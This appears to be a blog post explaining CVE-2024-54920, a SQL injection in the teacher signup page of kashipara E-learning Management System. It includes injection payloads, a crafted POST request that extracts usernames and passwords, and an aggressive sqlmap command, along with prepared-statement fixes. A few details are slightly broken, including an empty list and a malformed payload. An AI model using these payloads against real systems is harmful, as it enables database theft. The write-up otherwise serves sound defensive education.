CVE-2024-54920 - SQL Injection in kashipara E-learning Management System v1. (teacher_signup.php) – Exploit Details & Walkthrough

A recently disclosed vulnerability, CVE-2024-54920, has drawn attention in the security community. This SQL Injection flaw was found in the /teacher_signup.php file of the popular kashipara E-learning Management System v1. In this post, we’ll break down what this means, show code examples of the flawed and the fixed code, explain how attackers can exploit it, and point you to useful references.

What is the Vulnerability?

The flaw sits in the way /teacher_signup.php handles user-supplied input for the parameters firstname, lastname, and class_id. Instead of treating these values as plain text (which is what you always want!), the system glues them directly into SQL queries. As a result, an attacker could sneak in malicious SQL code, letting them do things like:

Let’s look at a simplified version of what might be happening under the hood:

<?php
// teacher_signup.php (vulnerable pseudocode)
// $conn is assumed to be an open mysqli connection.

$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$class_id = $_POST['class_id'];

// Dangerous way to build the SQL query: the raw POST values are
// concatenated straight into the statement text.
$sql = "INSERT INTO teachers (firstname, lastname, class_id) VALUES ('$firstname', '$lastname', '$class_id')";
$result = mysqli_query($conn, $sql);
?>

If no input validation or parameter binding is done, anything a user submits gets shoved into the raw SQL query!

How Attackers Exploit CVE-2024-54920

Let’s say an attacker wants to read more out of the database, or even grab a whole users table. Here’s a step-by-step of how they might do it:

Say the attacker submits the following for the firstname field:

', (SELECT GROUP_CONCAT(username, ':', password) FROM users), '

When the form is submitted, the SQL builds into:

INSERT INTO teachers (firstname, lastname, class_id) 
VALUES ('', (SELECT GROUP_CONCAT(username, ':', password) FROM users), '', 'someclass')

This is invalid for an INSERT (four values for three columns), but with some trial and error and knowledge of the DB structure, an attacker can adapt the query for maximum impact.

With a different payload in the firstname field, the query instead becomes:

INSERT INTO teachers (firstname, lastname, class_id) VALUES ('test' OR 1=1 -- ', 'lname', '1')

The comment sequence (-- ) causes everything after it to be ignored. Depending on the configuration, this could let an attacker bypass logic or inject further statements.

Example POST Request with Malicious SQL

POST /teacher_signup.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

firstname=test', password=(SELECT GROUP_CONCAT(username, x3a, password) FROM users)#&lastname=a&class_id=1

Attackers also commonly reach for a tool like sqlmap (open-source and easy to leverage):

sqlmap -u "http://victim.com/teacher_signup.php" --data="firstname=test&lastname=test&class_id=1" --risk=3 --level=5 --dbs

This command instructs sqlmap to automatically find and exploit SQL Injections, dumping database names, and, if possible, tables and data.

Why Does This Happen?

Root cause:
User inputs are inserted directly into database queries without sanitization or use of prepared statements.

The proper way:

// Prepared statement: the SQL text is sent first and the three values
// are bound separately ('s' = string, 'i' = integer), so user input is
// never parsed as part of the query.
$stmt = $conn->prepare('INSERT INTO teachers (firstname, lastname, class_id) VALUES (?, ?, ?)');
$stmt->bind_param('ssi', $firstname, $lastname, $class_id);
$stmt->execute();

Impact:

- Unauthorized data access: Database tables may leak private info (usernames, passwords, emails)
- Potential for further hacking: If the attacker is motivated, they could escalate to full server control

How to protect yourself:

1. Use prepared statements: Bind every user-supplied value as a parameter, as in the fix above.
2. Sanitize user input: Use validation (e.g., regex to allow only legitimate names)
3. Update software: If you’re using an affected version, check with the upstream repository for any patches.
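Putting steps 1 and 2 together, here is a hardened version of the signup handler. This is an added example, not the project’s own code; it assumes $conn is an open mysqli connection, the teachers table from the snippet above, and the mbstring extension. The names validate_name, validate_class_id and register_teacher are chosen for this example.

```php
<?php
// Hardened teacher_signup.php handler (added example, not kashipara's code).
// Assumes: $conn is an open mysqli connection; table `teachers` has columns
// firstname, lastname (VARCHAR) and class_id (INT); mbstring is available.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // DB errors become exceptions

// Defence in depth: reject anything that is not a plausible name before it
// reaches the database. Letters, spaces, hyphens and apostrophes, 1-50 chars,
// starting with a letter. Quotes-first, parentheses, commas, '=' and '--'
// payloads like the ones shown above all fail this check.
function validate_name(string $raw): ?string
{
    $name = trim($raw);
    if ($name === '' || mb_strlen($name) > 50) {
        return null;
    }
    return preg_match('/^\p{L}[\p{L} \'\-]*$/u', $name) === 1 ? $name : null;
}

// class_id must be a positive integer; "1 OR 1=1" is not an integer.
function validate_class_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The real fix: parameters travel separately from the SQL text, so even a
// value that slipped past validation is stored verbatim, never parsed as SQL.
function register_teacher(mysqli $conn, string $first, string $last, int $classId): int
{
    $stmt = $conn->prepare(
        'INSERT INTO teachers (firstname, lastname, class_id) VALUES (?, ?, ?)'
    );
    $stmt->bind_param('ssi', $first, $last, $classId);
    $stmt->execute();
    $newId = $stmt->insert_id;
    $stmt->close();
    return $newId;
}

$firstname = validate_name($_POST['firstname'] ?? '');
$lastname  = validate_name($_POST['lastname'] ?? '');
$class_id  = validate_class_id($_POST['class_id'] ?? '');

if ($firstname === null || $lastname === null || $class_id === null) {
    http_response_code(400);
    exit('Invalid signup data.'); // generic message: never echo the raw input back
}

$teacherId = register_teacher($conn, $firstname, $lastname, $class_id);
```

Validation here is a second line of defence; the prepared statement alone already neutralises the injection, but rejecting malformed input early also gives you a clean signal to log and alert on.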

References

- NVD CVE Entry (CVE-2024-54920)
- Kashipara E-learning Management System v1. – Project Page
- PHP: SQL Injection Prevention
- OWASP: SQL Injection

Final Words

If you’re running kashipara E-learning Management System v1., take action now! Patch your system and never trust user input. SQL Injection is one of the oldest and most dangerous vulnerabilities, but it’s also easy to fix with good development habits.

Stay safe, keep your code clean, and always sanitize those inputs!

Timeline

Published on: 12/09/2024 15:15:21 UTC
Last modified on: 12/10/2024 15:41:01 UTC